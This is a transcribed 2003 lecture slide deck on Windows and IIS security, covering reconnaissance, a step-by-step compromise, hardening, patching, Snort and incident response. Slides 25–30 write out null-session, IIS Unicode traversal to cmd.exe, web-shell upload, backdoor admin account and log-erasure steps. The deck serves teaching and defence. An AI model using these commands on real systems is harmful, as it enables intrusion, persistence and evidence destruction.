1. Slide 1 1 Windows Security Analysis Computer Science E-Commerce Security ‘2003’ Matthew Cook http://escarpment.net/

2. Slide 2 2 Introduction Loughborough University http://www.lboro.ac.uk/computing/ Bandwidth Management Advisory Service http://bmas.ja.net/

3. Slide 3 3 Windows Security Analysis Introduction Step-by-step Machine Compromise Preventing Attack Incident Response Further Reading

4. Slide 4 4 Introduction Basic Security Overview

5. Slide 5 5 Physical Security Secure Location BIOS restrictions Password Protection Boot Devices Case Locks Case Panels

6. Slide 6 6 Security Threats Denial of Service Theft of information Modification Fabrication (Spoofing or Masquerading)

7. Slide 7 7 Security Threats… Why a compromise can occur: Physical Security Holes Software Security Holes Incompatible Usage Security Holes Social Engineering Complacency

8. Slide 8 8 The Easiest Security Improvement Good passwords Usernames and Passwords are the primary security defence Use a password that is easy to type to avoid ‘Shoulder Surfers’ Use the first letters from song titles, song lyrics or film quotations

9. Slide 9 9 Can you buy Security? “This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e- commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?” Bruce Schneier

10. Slide 10 10 Step-by-step Machine Compromise Why, where, how?

11. Slide 11 11 Background Reasons for Attack: Personal Issues Political Statement Financial Gain (Theft of money, information) Learning Experience DoS (Denial of Service) Support for Illegal Activity

12. Slide 12 12 Gathering Information Companies House Internet Search URL: http://www.google.co.uk http://www.google.co.uk Whois URL: http://www.netsol.com/cgi-bin/whois/whois http://www.netsol.com/cgi-bin/whois/whois A Whois query can provide: –The Registrant –The Domain Names Registered –The Administrative, Technical and Billing Contact –Record updated and created date stamps –DNS Servers for the Domain

13. Slide 13 13 Gathering Information… Use Nslookup or dig dig @ dig @ Different query type available: –A – Network address –Any – All or Any Information available –Mx – Mail exchange records –Soa – Zone of Authority –Hinfo – Host information –Axfr – Zone Transfer –Txt – Additional strings

14. Slide 14 14 Identifying System Weakness Many products available: NmapNessusPandoraPwdump L0pht Crack Null Authentication

15. Slide 15 15 Nmap Port Scanning Tool Stealth scanning, OS Fingerprinting Open Source Runs under Unix based OS Port development for Win32 URL: http://www.insure.org/nmap/

16. Slide 16 16 Nmap

17. Slide 17 17 Nessus Remote security scanner Very comprehensive Frequently updated modules Testing of DoS attacks Open Source Win32 and Java Client URL: http://nessus.org/

18. Slide 18 18 pwdump Version 3 (e = encrypted) Developed by Phil Staubs and Erik Hjelmstad Based on pwdump and pwdump2 URL: http://www.ebiz-tech.com/html/pwdump.html http://www.ebiz-tech.com/html/pwdump.html Needs Administrative Privilidges Extracts hashs even if syskey is installed Extract from remote machines Identifies accounts with no password Self contained utility

19. Slide 19 19 L0pht Crack Password Auditing and Recovery Crack Passwords from many sources Registration $249 URL: http://www.atstake.com/research/lc3/

20. Slide 20 20 L0pht Crack Crack Passwords from: Local Machine Remote Machine SAM File SMB Sniffer PWDump file

21. Slide 21 21 Nmap Analysis nmap –sP 158.125.0.0/16 - Ping scan! nmap –sS158.125.0.0/16 - Stealth scan

22. Slide 22 22 Nmap Analysis… TCP Connect Scan Completes a ‘Three Way Handshake’ Very noisy (Detection by IDS)

23. Slide 23 23 Nmap Analysis… TCP SYN Scan Half open scanning (Full port TCP connection not made) Less noisy than the TCP Connect Scan

24. Slide 24 24 Nmap Analysis… TCP FIN Scan –FIN Packet sent to target port –RST returned for all closed ports –Mostly works UNIX based TCP/IP Stacks TCP Xmas Tree Scan –Sends a FIN, URG and PUSH packet –RST returned for all closed ports TCP Null Scan –Turns off all flags –RST returned for all closed ports UDP Scan –UDP Packet sent to target port –“ICMP Port Unreachable” for closed ports

25. Slide 25 25 Null Authentication Null Authentication: Net use \\camford\IPC$ “” /u:“” \\camford\IPC$ Famous tools like ‘Red Button’ Net view \\camford \\camford List of Users, groups and shares Last logged on date Last password change Much more…

26. Slide 26 26 Exploiting the Security Hole Using IIS Unicode/Directory Traversal /scripts/../../winnt/system32/cmd.exe /c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir Displays the listing of c: in browser Copy cmd.exe to /scripts/root.exe Echo upload.asp GET /scripts/root.exe /c+echo+[blah]>upload.asp Upload cmdasp.asp using upload.asp Still vulnerable on 24% of E-Commerce servers

27. Slide 27 27 Gaining ‘Root’ Cmdasp.asp provides a cmd shell in the SYSTEM context Increase in privileges is now simple ISAPI.dll – RevertToSelf (Horovitz) Version 2 coded by Foundstone http://camford/scripts/idq.dllhttp://camford/scripts/idq.dll? http://camford/scripts/idq.dll Patch Bulletin: MS01-26 NOT included in Windows 2000 SP2

28. Slide 28 28 Backdoor Access Create several user accounts Net user iisservice /ADD Net localgroup administrators iisservice /ADD Add root shells on high end ports Tiri is 3Kb in size Add backdoors to ‘Run’ registry keys

29. Slide 29 29 System Alteration Web page alteration Information Theft Enable services Add VNC Creating a Warez Server Net start msftpsvc Check access Upload file 1Mb in size Advertise as a warez server

30. Slide 30 30 Audit Trail Removal Many machines have auditing disabled Main problems are IIS logs DoS IIS before logs sync to disc Erase logs from hard disc Erasing Eventlog harder IDS Systems Network Monitoring at firewall

31. Slide 31 31 Preventing Attack How to stop the attack from happening and how to limit the damage from crackers!

32. Slide 32 32 NetBIOS/SMB Services NetBIOS Browsing Request [UDP 137] NetBIOS Browsing Response [UDP 138] NetBIOS Communications [TCP 135] CIFS [TCP 139, 445 UDP 445] Port 445 Windows 2000 only Block ports at firewall Netstat -A

33. Slide 33 33 NetBIOS/SMB Services… To disable NetBIOS 1. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. 2. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial- up connections’ window

34. Slide 34 34 NetBIOS/SMB Services… Disable Null Authentication HKLM\SYSTEM\CurrentControlSet\Control\LSA\Re strictAnonymous REG_DWORD set to 0, 1 or 2! HKLM\SYSTEM\CurrentControlSet\Control\Secure PipeServers\RestrictAnonymous REG_DWORD set to 0 or 1

35. Slide 35 35 Operating System Patching Operating Systems do contain bugs, and patches are a common method of distributing these fixes. A patch or hot fix usually contains a fix for one discovered bug. Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in the soon to be released SP4 for Windows 2000.

36. Slide 36 36 Operating System Patching… Only install patches after you have tested them in a development environment. Only install patches obtained direct from the vendor. Install security patches as soon as possible after released. Install feature patches as and when needed. Automate patch collection and installation as much as possible (QChain).

37. Slide 37 37 Operating System Patching… Use automated patching technology: SUS – Microsoft Software Update Service SMS – Microsoft Systems Management Server Ghost – Symantec imaging software. And other application deployment software: Lights out Distribution Deferred installation

38. Slide 38 38 Baseline Security Analyzer Freely available from Microsoft Written by Shavlik Technologies as a direct result of Code Red attacks A GUI to HFNetChk (v3.81) Improved feature set Integrated SUS functionality

39. Slide 39 39 Baseline Security Analyzer… MBSA v1.1 supports the following host OS: Windows 2000 Professional / Server Windows XP Home / Professional Windows.NET not officially supported Windows NT not supported as host OS Remote scanning available

40. Slide 40 40 Baseline Security Analyzer… What applications does MBSA scan? Operating system Internet Explorer > 5.01 Microsoft Office 2000 and 2002 Media Player > 6.4 Internet Information Services 4.0 and 5.0 SQL Server 7.0 and 2000 Exchange Server 5.5 and 2000

41. Slide 41 41 IPSec IP security Linux Connectivity using FreeS/WAN Mainly for wireless use WEP encryption cracked URL: http://www.freeswan.org/ URL: http://airsnort.sourceforge.net/

42. Slide 42 42 Recent Worms Sadmind/IIS Directory Traversal (Unicode Exploit) CodeRed ida/idq buffer overflow CodeGreen ida/idq buffer overflow Nimda Directory Traversal (Unicode Exploit) Slammer MS SQL Server transaction control

43. Slide 43 43 Sadmind/IIS 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ f***+USA+Govern ment^ ^ ^ ^ ^ f***+Poiz onBOx^ ^ ^ ^ contact:sysadmc n@yahoo.com.cn^ >../wwwroot/default.htm 200 -

44. Slide 44 44 IDS Snort IDS – Intrusion Detection System Libpcap packet sniffer and logger Originally developed for the Unix platforms Open Source Port to Win32 available (Release 1.8.1) Installation on Win32 in under 30 minutes Run on your IIS server or standalone

45. Slide 45 45 IDS Snort… Snort can detect: Stealth Port Scans CGI Attacks Front Page Extensions Attacks ICMP Activity SMTP Activity SQL Activity SMB Probes

46. Slide 46 46 Incident Response What to do when something does go wrong!

47. Slide 47 47 Incident Response… Don’t Panic! Unplug the network Get a notebook Back-up the system and keep the Back-ups Restrict use of email Look for information Investigate the cause Request help and assistance.

48. Slide 48 48 Incident Response… Important to return to service swiftly –Do not jeopardize security –If in doubt, re-build –Perform forensics on a backup Keep documentation and evidence Contact local CERT if investigation proves non worm/script kiddie activity.

49. Slide 49 49 Further Reading Garfinkel, S. Web Security & Commerce O’Reilly [ISBN 1-56592-269-7] Hassler, V. Security Fundamentals for E- Commerce Artech House [ISBN 1-58053-108-3] Huth, M R A. Secure Communicating Systems Cambridge Uni Press [ISBN 0-52180-731-X] Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]

50. Slide 50 50 Useful Books, Tools and URLs Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.) Incident Response. (Kenneth R. van Wyk, Richard Forno.) Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al) Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)

51. Slide 51 51 Useful Books, Tools and URLs Microsoft Security Website http://www.microsoft.com/security/ http://www.microsoft.com/security/ Computer Security Incident Response Team http://www.cert.org/csirts/csirt_faq.html http://www.cert.org/csirts/csirt_faq.html JANET CERT http://www.ja.net/cert/ http://www.ja.net/cert/ Bugtraq Mailing List http://online.securityfocus.com/ http://online.securityfocus.com/

52. Slide 52 52 Questions Slides available at: http://escarpment.net/